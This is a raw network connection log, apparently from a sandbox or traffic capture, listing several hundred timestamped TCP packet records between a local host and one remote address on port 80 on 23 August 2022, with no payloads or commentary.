Aug 23, 2022 18:25:29.739033937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739058971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739061117 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739079952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739082098 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739105940 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739106894 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739129066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739130974 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739152908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739154100 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739173889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739181995 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739193916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739207983 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739212990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739228964 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739253998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739283085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739290953 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739306927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739320040 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739330053 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739372015 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739384890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739396095 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739411116 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739434004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739434004 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739455938 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739459991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739481926 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739484072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739506006 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739506006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739528894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739531040 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739553928 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739557028 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739578962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739583015 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739603996 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739605904 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739630938 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739643097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739654064 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739665985 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739676952 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739691019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739705086 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739713907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739727020 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739737988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739752054 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739761114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739778996 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739784002 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739801884 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739806890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739820957 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739830971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739854097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739854097 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739871979 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739892960 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.774344921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774383068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774404049 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774444103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774465084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774487019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774509907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774537086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774561882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774586916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774610996 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774636030 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774658918 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774679899 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774704933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.774728060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.775594950 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.775648117 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.776352882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.776382923 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.776402950 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.776452065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.776460886 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.776474953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.776495934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.776500940 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.776516914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.776524067 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.776540041 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.776573896 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.776588917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.776608944 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.776609898 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.776631117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.776642084 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.776669025 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.777699947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.777765989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.777791023 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.777801037 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.777815104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.777822971 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.777839899 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.777848959 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.777863979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.777884007 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.777885914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.777909040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.777929068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.777931929 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.777949095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.777954102 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.777971983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.777993917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778013945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778013945 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778033972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778054953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778057098 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778074026 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778083086 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778094053 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778115034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778121948 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778136015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778160095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778165102 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778181076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778189898 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778203011 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778223038 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778232098 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778244019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778263092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778275967 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778290987 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778311014 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778323889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778331041 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778343916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778367996 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778372049 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778389931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778394938 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778412104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778418064 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778444052 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778466940 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.778727055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778752089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778776884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778800964 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778824091 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778846979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778867960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778892040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778913975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778937101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778961897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.778985023 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779006958 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779028893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779052019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779076099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779098988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779122114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779148102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779172897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779201031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779226065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779252052 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779278040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779304981 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779330015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779376984 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779400110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779448986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779473066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779498100 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779525042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779552937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779578924 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.779625893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.782893896 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.783572912 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.783626080 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.783729076 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.901623964 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.902158976 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.939460993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939510107 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939533949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939558983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939583063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939610004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939636946 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939666986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939691067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939716101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939742088 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939768076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939793110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939820051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939894915 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939919949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939945936 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939970970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.939999104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940025091 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940049887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940074921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940103054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940128088 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940152884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940176964 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940202951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940231085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940257072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940289974 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940349102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940376997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940402031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940428019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940452099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940476894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940496922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940520048 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940542936 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940568924 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940592051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940615892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940646887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940670013 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940695047 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940718889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940742970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940766096 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940792084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940871954 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940918922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940943003 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940968037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.940993071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941015959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941040039 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941063881 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941090107 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941113949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941137075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941162109 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941185951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941210032 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941234112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941257000 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941281080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941310883 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941334009 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941356897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941381931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941406012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941431046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941478968 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941555977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941632986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941658020 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941725969 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941792965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941873074 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.941909075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942034960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942112923 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942151070 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942205906 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942264080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942439079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942466021 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942540884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942590952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942696095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942707062 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.942720890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942806005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942830086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942853928 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942876101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942936897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942960978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.942994118 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943017960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943056107 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.943070889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943116903 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943154097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943186045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943273067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943341017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943413973 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943449974 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943526983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943592072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943671942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943710089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943733931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943789959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943818092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943857908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943881989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943913937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943938971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.943995953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944072962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944097042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944120884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944150925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944200993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944271088 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944298029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944335938 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944359064 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944391966 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944416046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944458961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944549084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944572926 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944597006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944621086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944649935 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944714069 CEST	80	49943	88.198.122.116	192.168.2.3
